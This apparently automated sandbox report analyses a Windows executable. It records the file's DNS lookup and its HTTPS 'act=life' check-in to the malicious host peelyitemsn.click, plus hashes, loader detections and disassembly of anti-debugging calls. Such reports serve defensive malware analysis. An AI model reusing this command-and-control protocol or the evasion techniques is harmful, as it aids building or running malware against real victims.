                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 27, 2024 08:13:05.187879086 CET192.168.2.81.1.1.10xecfStandard query (0)peelyitemsn.clickA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 27, 2024 08:13:05.507018089 CET1.1.1.1192.168.2.80xecfNo error (0)peelyitemsn.click104.21.62.151A (IP address)IN (0x0001)false
                                                        Dec 27, 2024 08:13:05.507018089 CET1.1.1.1192.168.2.80xecfNo error (0)peelyitemsn.click172.67.136.183A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • peelyitemsn.click

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.849706104.21.62.1514437452C:\Users\user\Desktop\3vLKNycnrz.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-27 07:13:07 UTC264OUTPOST /api HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                        Content-Length: 8
                                                        Host: peelyitemsn.click
                                                        2024-12-27 07:13:07 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                        Data Ascii: act=life
                                                        2024-12-27 07:13:08 UTC1132INHTTP/1.1 200 OK
                                                        Date: Fri, 27 Dec 2024 07:13:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Set-Cookie: PHPSESSID=bkeu8p46g8asfgmahjtgh0o5m2; expires=Tue, 22 Apr 2025 00:59:46 GMT; Max-Age=9999999; path=/
                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                        Pragma: no-cache
                                                        X-Frame-Options: DENY
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        cf-cache-status: DYNAMIC
                                                        vary: accept-encoding
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uw%2FRRdMdeQWGANOH1CqeikSMujYeiosfNhdEJmYdKGqQUaPHPtRF4zFOO%2BWDS9%2BqyicB7doA2yjZfLHax2M3TlCcK8m%2FAmkU00MuMjFqT1175HGiIyqmT644oU5LGyRIUGL73g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f878196ff9841c6-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1698&rtt_var=647&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1678160&cwnd=204&unsent_bytes=0&cid=eed846db26c4af20&ts=1110&x=0"
                                                        2024-12-27 07:13:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                        Data Ascii: 2ok
                                                        2024-12-27 07:13:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Statistics

                                                        CPU Usage

                                                        0510s020406080100

                                                        Click to jump to process

                                                        Memory Usage

                                                        0510s0.002040MB

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        • File
                                                        • Registry

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:02:13:02
                                                        Start date:27/12/2024
                                                        Path:C:\Users\user\Desktop\3vLKNycnrz.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\3vLKNycnrz.exe"
                                                        Imagebase:0xd60000
                                                        File size:3'635'712 bytes
                                                        MD5 hash:78B4D3E1DF367155161B0CA24D08B157
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1430982949.0000000006240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true
                                                        Show Windows behavior

                                                        File Activities

                                                        Show Windows behavior

                                                        Section Activities

                                                        Show Windows behavior

                                                        Registry Activities

                                                        COM Activities

                                                        Show Windows behavior

                                                        Mutex Activities

                                                        Show Windows behavior

                                                        Process Activities

                                                        Show Windows behavior

                                                        Thread Activities

                                                        Show Windows behavior

                                                        Memory Activities

                                                        Show Windows behavior

                                                        System Activities

                                                        Process Token Activities


                                                        General

                                                        Target ID:2
                                                        Start time:02:13:03
                                                        Start date:27/12/2024
                                                        Path:C:\Users\user\Desktop\3vLKNycnrz.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\3vLKNycnrz.exe"
                                                        Imagebase:0xb10000
                                                        File size:3'635'712 bytes
                                                        MD5 hash:78B4D3E1DF367155161B0CA24D08B157
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        Show Windows behavior

                                                        Section Activities

                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        Show Windows behavior

                                                        Process Activities

                                                        Show Windows behavior

                                                        Thread Activities

                                                        Show Windows behavior

                                                        Memory Activities

                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                        Disassembly

                                                        Execution Graph

                                                        Execution Coverage

                                                        Dynamic/Packed Code Coverage

                                                        Signature Coverage

                                                        Execution Coverage:8.7%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:22.9%
                                                        Total number of Nodes:48
                                                        Total number of Limit Nodes:2
                                                        Show Legend
                                                        Hide Nodes/Edges
                                                        execution_graph 26603 32909e0 26604 32909fb 26603->26604 26608 3292c38 26604->26608 26612 3292d48 26604->26612 26617 3292df7 26604->26617 26622 3292c78 26608->26622 26628 3292c88 26608->26628 26609 3292c62 26609->26604 26613 3292d7b 26612->26613 26614 3292df0 26613->26614 26648 3292ea8 26613->26648 26653 3292e98 26613->26653 26614->26604 26618 3292dfc 26617->26618 26620 3292ea8 2 API calls 26618->26620 26621 3292e98 2 API calls 26618->26621 26619 3292e05 26619->26604 26620->26619 26621->26619 26623 3292c9e 26622->26623 26624 3292cca 26623->26624 26634 3291378 26623->26634 26638 3291310 26623->26638 26643 3291320 26623->26643 26624->26609 26629 3292c9e 26628->26629 26630 3292cca 26629->26630 26631 3291378 CheckRemoteDebuggerPresent 26629->26631 26632 3291320 CheckRemoteDebuggerPresent 26629->26632 26633 3291310 CheckRemoteDebuggerPresent 26629->26633 26630->26609 26631->26630 26632->26630 26633->26630 26635 32913c0 CheckRemoteDebuggerPresent 26634->26635 26637 3291406 26635->26637 26637->26624 26640 3291315 26638->26640 26639 3291359 26639->26624 26640->26639 26641 32913db CheckRemoteDebuggerPresent 26640->26641 26642 3291406 26641->26642 26642->26624 26645 3291331 26643->26645 26644 3291359 26644->26624 26645->26644 26646 32913db CheckRemoteDebuggerPresent 26645->26646 26647 3291406 26646->26647 26647->26624 26649 3292ece 26648->26649 26650 3292eee 26649->26650 26658 3292b29 26649->26658 26662 3292b30 26649->26662 26650->26614 26654 3292ece 26653->26654 26655 3292eee 26654->26655 26656 3292b29 NtQueryInformationProcess 26654->26656 26657 3292b30 NtQueryInformationProcess 26654->26657 26655->26614 26656->26655 26657->26655 26659 3292b7b NtQueryInformationProcess 26658->26659 26661 3292bbf 26659->26661 26661->26650 26663 3292b7b NtQueryInformationProcess 26662->26663 26665 3292bbf 26663->26665 26665->26650

                                                        Executed Functions

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 609a678-609a6a6 1 609a6a8 0->1 2 609a6ad-609a7cf 0->2 1->2 6 609a7d1-609a7e7 2->6 7 609a7f3-609a7ff 2->7 285 609a7ed call 609d208 6->285 286 609a7ed call 609d1f8 6->286 8 609a801 7->8 9 609a806-609a80b 7->9 8->9 11 609a80d-609a819 9->11 12 609a843-609a88c 9->12 13 609a81b 11->13 14 609a820-609a83e 11->14 21 609a88e 12->21 22 609a893-609ab58 12->22 13->14 16 609bfa7-609bfad 14->16 17 609bfd8 16->17 18 609bfaf-609bfcf 16->18 20 609bfd9 17->20 18->17 20->20 21->22 48 609b588-609b594 22->48 49 609b59a-609b5d2 48->49 50 609ab5d-609ab69 48->50 59 609b6ac-609b6b2 49->59 51 609ab6b 50->51 52 609ab70-609ac95 50->52 51->52 87 609acd5-609ad5e 52->87 88 609ac97-609accf 52->88 60 609b6b8-609b6f0 59->60 61 609b5d7-609b654 59->61 71 609ba4e-609ba54 60->71 76 609b687-609b6a9 61->76 77 609b656-609b65a 61->77 73 609ba5a-609baa2 71->73 74 609b6f5-609b8f7 71->74 82 609bb1d-609bb68 73->82 83 609baa4-609bb17 73->83 168 609b8fd-609b991 74->168 169 609b996-609b99a 74->169 76->59 77->76 81 609b65c-609b684 77->81 81->76 106 609bf71-609bf77 82->106 83->82 115 609ad6d-609adf1 87->115 116 609ad60-609ad68 87->116 88->87 108 609bb6d-609bbef 106->108 109 609bf7d-609bfa5 106->109 127 609bbf1-609bc0c 108->127 128 609bc17-609bc23 108->128 109->16 143 609ae00-609ae84 115->143 144 609adf3-609adfb 115->144 117 609b579-609b585 116->117 117->48 127->128 130 609bc2a-609bc36 128->130 131 609bc25 128->131 135 609bc49-609bc58 130->135 136 609bc38-609bc44 130->136 131->130 139 609bc5a 135->139 140 609bc61-609bf39 135->140 138 609bf58-609bf6e 136->138 138->106 139->140 145 609be2e-609be96 139->145 146 609bdc0-609be29 139->146 147 609bd52-609bdbb 139->147 148 609bcd5-609bd4d 139->148 149 609bc67-609bcd0 139->149 172 609bf44-609bf50 140->172 191 609ae93-609af17 143->191 192 609ae86-609ae8e 143->192 144->117 179 609bf0a-609bf10 145->179 146->172 147->172 148->172 149->172 193 609ba35-609ba4b 168->193 174 609b99c-609b9f5 169->174 175 609b9f7-609ba34 169->175 172->138 174->193 175->193 184 609be98-609bef6 179->184 185 609bf12-609bf1c 179->185 196 609bef8 184->196 197 609befd-609bf07 184->197 185->172 206 609af19-609af21 191->206 207 609af26-609afaa 191->207 192->117 193->71 196->197 197->179 206->117 213 609afb9-609b03d 207->213 214 609afac-609afb4 207->214 220 609b04c-609b0d0 213->220 221 609b03f-609b047 213->221 214->117 227 609b0df-609b163 220->227 228 609b0d2-609b0da 220->228 221->117 234 609b172-609b1f6 227->234 235 609b165-609b16d 227->235 228->117 241 609b1f8-609b200 234->241 242 609b205-609b289 234->242 235->117 241->117 248 609b298-609b31c 242->248 249 609b28b-609b293 242->249 255 609b32b-609b3af 248->255 256 609b31e-609b326 248->256 249->117 262 609b3be-609b442 255->262 263 609b3b1-609b3b9 255->263 256->117 269 609b451-609b4d5 262->269 270 609b444-609b44c 262->270 263->117 276 609b4e4-609b568 269->276 277 609b4d7-609b4df 269->277 270->117 283 609b56a-609b572 276->283 284 609b574-609b576 276->284 277->117 283->117 284->117 285->7 286->7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 2
                                                        • API String ID: 0-450215437
                                                        • Opcode ID: 65a82027daf4801640a1d885538c50d7f2c8df6a27062d0c07732b859e7c08f9
                                                        • Instruction ID: 1efd07c3f49b3bb234c80a25b0f2cf9078b6aaaec64b57d382fa29c701ca1a4c
                                                        • Opcode Fuzzy Hash: 65a82027daf4801640a1d885538c50d7f2c8df6a27062d0c07732b859e7c08f9
                                                        • Instruction Fuzzy Hash: 53E2B074A01629CFDB64DF68D884B9EBBB6FB88311F1081EAD509A7354DB349E81CF50

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 287 6099430-6099451 288 6099458-609953f 287->288 289 6099453 287->289 291 6099c41-6099c69 288->291 292 6099545-6099686 call 6095ba8 288->292 289->288 295 609a2e5-609a2ee 291->295 338 6099c0a-6099c34 292->338 339 609968c-60996e7 292->339 297 609a2f4-609a30b 295->297 298 6099c77-6099c81 295->298 300 6099c88-6099d7c call 6095ba8 298->300 301 6099c83 298->301 321 6099d7e-6099d8a 300->321 322 6099da6 300->322 301->300 323 6099d8c-6099d92 321->323 324 6099d94-6099d9a 321->324 325 6099dac-6099dcc 322->325 326 6099da4 323->326 324->326 329 6099e2c-6099eac 325->329 330 6099dce-6099e27 325->330 326->325 352 6099eae-6099f01 329->352 353 6099f03-6099f46 call 6095ba8 329->353 344 609a2e2 330->344 349 6099c3e 338->349 350 6099c36 338->350 346 60996e9 339->346 347 60996ec-60996f7 339->347 344->295 346->347 351 6099b1f-6099b25 347->351 349->291 350->349 355 6099b2b-6099ba7 351->355 356 60996fc-609971a 351->356 376 6099f51-6099f5a 352->376 353->376 397 6099bf4-6099bfa 355->397 358 609971c-6099720 356->358 359 6099771-6099786 356->359 358->359 363 6099722-609972d 358->363 361 6099788 359->361 362 609978d-60997a3 359->362 361->362 366 60997aa-60997c1 362->366 367 60997a5 362->367 368 6099763-6099769 363->368 373 60997c8-60997de 366->373 374 60997c3 366->374 367->366 371 609976b-609976c 368->371 372 609972f-6099733 368->372 375 60997ef-609985a 371->375 377 6099739-6099751 372->377 378 6099735 372->378 379 60997e0 373->379 380 60997e5-60997ec 373->380 374->373 382 609985c-6099868 375->382 383 609986e-6099a23 375->383 385 6099fba-6099fc9 376->385 386 6099758-6099760 377->386 387 6099753 377->387 378->377 379->380 380->375 382->383 395 6099a25-6099a29 383->395 396 6099a87-6099a9c 383->396 388 6099fcb-609a053 385->388 389 6099f5c-6099f84 385->389 386->368 387->386 424 609a17e-609a18a 388->424 392 6099f8b-6099fb4 389->392 393 6099f86 389->393 392->385 393->392 395->396 398 6099a2b-6099a3a 395->398 402 6099a9e 396->402 403 6099aa3-6099ac4 396->403 400 6099ba9-6099bf1 397->400 401 6099bfc-6099c02 397->401 407 6099a79-6099a7f 398->407 400->397 401->338 402->403 404 6099acb-6099aea 403->404 405 6099ac6 403->405 408 6099aec 404->408 409 6099af1-6099b11 404->409 405->404 411 6099a3c-6099a40 407->411 412 6099a81-6099a82 407->412 408->409 417 6099b18 409->417 418 6099b13 409->418 415 6099a4a-6099a6b 411->415 416 6099a42-6099a46 411->416 419 6099b1c 412->419 420 6099a6d 415->420 421 6099a72-6099a76 415->421 416->415 417->419 418->417 419->351 420->421 421->407 426 609a058-609a061 424->426 427 609a190-609a1dc 424->427 428 609a06a-609a172 426->428 429 609a063 426->429 436 609a1de-609a202 427->436 437 609a204-609a21f 427->437 442 609a178 428->442 429->428 430 609a0dc-609a10d 429->430 431 609a10f-609a140 429->431 432 609a070-609a0a1 429->432 433 609a0a6-609a0d7 429->433 430->442 431->442 432->442 433->442 438 609a228-609a2ac 436->438 437->438 446 609a2b3-609a2d3 438->446 442->424 446->344
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: {-!Q
                                                        • API String ID: 0-1025268147
                                                        • Opcode ID: 5d72bf474a6477be718cb04e2d52a55a493c89dee3541b3fc2d4eb9a16b7ccac
                                                        • Instruction ID: 28f05403953cbf3d73b78acbf817ac165b78d82e83bc2dbe1b60a3d642801733
                                                        • Opcode Fuzzy Hash: 5d72bf474a6477be718cb04e2d52a55a493c89dee3541b3fc2d4eb9a16b7ccac
                                                        • Instruction Fuzzy Hash: 84A29375A00628CFDB65CF69C984AD9BBB2FF89300F1581D9E509AB321DB319E81DF50

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 448 3291320-3291336 450 3291356-3291357 448->450 451 3291359-3291364 call 3290170 450->451 452 3291338-329133b 450->452 453 329133d-329134f 452->453 454 3291365-3291404 CheckRemoteDebuggerPresent 452->454 453->454 456 3291351 453->456 461 329140d-3291450 454->461 462 3291406-329140c 454->462 456->450 462->461
                                                        APIs
                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 032913F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1410716253.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_3290000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID:
                                                        • API String ID: 3662101638-0
                                                        • Opcode ID: 09213191c689f5a2bc70a3147c01d069cc96d50e0340eeb30f831ccda65e5196
                                                        • Instruction ID: dd17960e575a53eeb93273c9de13ba3a6ef24f7218cfb318b897d4e15df7f09f
                                                        • Opcode Fuzzy Hash: 09213191c689f5a2bc70a3147c01d069cc96d50e0340eeb30f831ccda65e5196
                                                        • Instruction Fuzzy Hash: B931E13190034ACFDB14DF6AC4407AEBBF8EF48310F24846ED459AB640CB39A986CB94

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 474 3292b29-3292bbd NtQueryInformationProcess 477 3292bbf-3292bc5 474->477 478 3292bc6-3292beb 474->478 477->478
                                                        APIs
                                                        • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 03292BB0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1410716253.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_3290000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InformationProcessQuery
                                                        • String ID:
                                                        • API String ID: 1778838933-0
                                                        • Opcode ID: 019b50b194cb9440b1949a27c96550395992abd6870d161a20a9f91ad7735b0b
                                                        • Instruction ID: f1b2fcfa83621f2461fd815ec625979e3e70464b26f3d9fd37e19cfdb0c1b78d
                                                        • Opcode Fuzzy Hash: 019b50b194cb9440b1949a27c96550395992abd6870d161a20a9f91ad7735b0b
                                                        • Instruction Fuzzy Hash: 6A21E2B19013499FDF10DFAAD884ADEFBF5FF88310F14882AE919A7250C7759954CBA0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 482 3292b30-3292bbd NtQueryInformationProcess 485 3292bbf-3292bc5 482->485 486 3292bc6-3292beb 482->486 485->486
                                                        APIs
                                                        • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 03292BB0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1410716253.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_3290000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InformationProcessQuery
                                                        • String ID:
                                                        • API String ID: 1778838933-0
                                                        • Opcode ID: 20364565e077aae221805161e8038debf50ffc69601492ffcf287c065815c617
                                                        • Instruction ID: ccceab54f254e6207d4182c23844be40018b2dc57b4028bf35981cb88c7e4729
                                                        • Opcode Fuzzy Hash: 20364565e077aae221805161e8038debf50ffc69601492ffcf287c065815c617
                                                        • Instruction Fuzzy Hash: A521E2B19003499FDB10DFAAD884A9EFBF5FF88310F10882AE919A7250C7759950CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1410716253.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_3290000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4bc85ab3c188dece98465aa29c0abc85198e06ff74050045030f653829389bd8
                                                        • Instruction ID: 5dd027cc054215193dd41441e279a765f7dc313d157a0cfd9680a58a34881db0
                                                        • Opcode Fuzzy Hash: 4bc85ab3c188dece98465aa29c0abc85198e06ff74050045030f653829389bd8
                                                        • Instruction Fuzzy Hash: 8E6219B0921205CFFB20DF4AE988A99BBF1FB50309F49C19AD4155F262C3B9E895CF51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3150793bd52341c97b623b5f2d9d72de88916000fd8a317776f09e91006f455c
                                                        • Instruction ID: b2a9b3c8a5e6c84b850f9c1ce14c67a4d7404d3f585ba2413bdabdac7fda8b27
                                                        • Opcode Fuzzy Hash: 3150793bd52341c97b623b5f2d9d72de88916000fd8a317776f09e91006f455c
                                                        • Instruction Fuzzy Hash: 64529474A006298FDBA4DF28CD84B9ABBB2FB88311F5081D9D50DA7355DB30AE81CF55
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1410716253.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_3290000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 43c52243a7d60910f874b3c3d37b091c2dad8d0adb4e0bc5b6d147ed55afdeb6
                                                        • Instruction ID: 7df1d88a96bb72b1c1f8bd9db8682a8e69656804f69bd457af1589206d61b428
                                                        • Opcode Fuzzy Hash: 43c52243a7d60910f874b3c3d37b091c2dad8d0adb4e0bc5b6d147ed55afdeb6
                                                        • Instruction Fuzzy Hash: 75F17C35A342058FEB15DB6CC890AAAB7F6FF89300F1585AAD406DB361DB71EC81CB51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f3ce4700831df6f7c094510dbc1288cc8c9be73f4684f8bf8992c68a286af9ed
                                                        • Instruction ID: 156563fe25d9e38b58f44bafe48a66698af71c1b6f98a2619ef8ea257404c626
                                                        • Opcode Fuzzy Hash: f3ce4700831df6f7c094510dbc1288cc8c9be73f4684f8bf8992c68a286af9ed
                                                        • Instruction Fuzzy Hash: 93519871E01A188BEB58CF6BDD4469AFAF3BFC8305F14C1AAD408AA254EB745981CF50

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 466 3291378-3291404 CheckRemoteDebuggerPresent 469 329140d-3291450 466->469 470 3291406-329140c 466->470 470->469
                                                        APIs
                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 032913F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1410716253.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_3290000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID:
                                                        • API String ID: 3662101638-0
                                                        • Opcode ID: 656b64bb48a6c3597d15bd9bfa8b3eaf3695e1367a88a39143e87107ce3b243a
                                                        • Instruction ID: 8d538a18430d5d2dad7ffc393e39a448b4a74abd83b282ad994b0a3c00feac70
                                                        • Opcode Fuzzy Hash: 656b64bb48a6c3597d15bd9bfa8b3eaf3695e1367a88a39143e87107ce3b243a
                                                        • Instruction Fuzzy Hash: 90215C7190034A8FDB14DFAAD4457EEBBF5AF88320F14842ED456A7290C7389A45DFA0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 714 6095440-609549f 718 60954a1 call 3297138 714->718 719 60954a1 call 3297148 714->719 720 60954a1 call 3297187 714->720 717 60954a6-60954a8 718->717 719->717 720->717
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: g05
                                                        • API String ID: 0-992802407
                                                        • Opcode ID: 0ec0e74a97ae46bcdcd11136383a4ec7fa346dd42137bd187dfbd2e3f4b19a0d
                                                        • Instruction ID: 560f454df55c7de7caa442b1f00bb50c355864882bc83593ce154e27dba11d71
                                                        • Opcode Fuzzy Hash: 0ec0e74a97ae46bcdcd11136383a4ec7fa346dd42137bd187dfbd2e3f4b19a0d
                                                        • Instruction Fuzzy Hash: 8A01442014A3D16FE30B4A385C11AB37F75EFC775075981EBE486CB1A3D9580D4B97A2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1429259358.00000000059F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_59f0000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: de03c853ebe5969d42fc21dd97eece4edefd57330208d101324c4bc8e8bc2da2
                                                        • Instruction ID: 5d55a0e44e21f0be6a93bc29751eb2da4b519d656a5df45332006fa2c999737f
                                                        • Opcode Fuzzy Hash: de03c853ebe5969d42fc21dd97eece4edefd57330208d101324c4bc8e8bc2da2
                                                        • Instruction Fuzzy Hash: B442A634E0420ACFDF15DB99D494AFEBBB6FB88301F50881ADA16A7394C7385982CF51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1429259358.00000000059F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_59f0000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7fc85e8c4827f96af0d2c7096064b1f171e5aef0a821afd6d1f20983848c256b
                                                        • Instruction ID: 206ba5c0a525847940213f2a08acd18de912cef1c015822f4b1594aab5e55c55
                                                        • Opcode Fuzzy Hash: 7fc85e8c4827f96af0d2c7096064b1f171e5aef0a821afd6d1f20983848c256b
                                                        • Instruction Fuzzy Hash: A6F1D434D05208DFCB54DFA9E898ABCBBB6FF49315F60486AE506A7350CB356985CF10
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1429259358.00000000059F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_59f0000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 217b0cf7c6048bcae2b921c4be89869368cc4a4e185b70f367cd5b09372630f3
                                                        • Instruction ID: 1eeb8d5eaec5a30fac93ca9f46d39166d011e35619647bc7651486e55d50102e
                                                        • Opcode Fuzzy Hash: 217b0cf7c6048bcae2b921c4be89869368cc4a4e185b70f367cd5b09372630f3
                                                        • Instruction Fuzzy Hash: 41A1E474E05209DFCB18EFA9D454ABDBBB6FF88305F54882AE91267350CB385986CF50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 59c81e5bb723f77b78defd775fcd24fe089fff40e5f3ddccc1ca3557f41fafa5
                                                        • Instruction ID: b71eca3737d0446d2381865e4359de3a23d8fcdc21b87436982cd11bc0db5ab6
                                                        • Opcode Fuzzy Hash: 59c81e5bb723f77b78defd775fcd24fe089fff40e5f3ddccc1ca3557f41fafa5
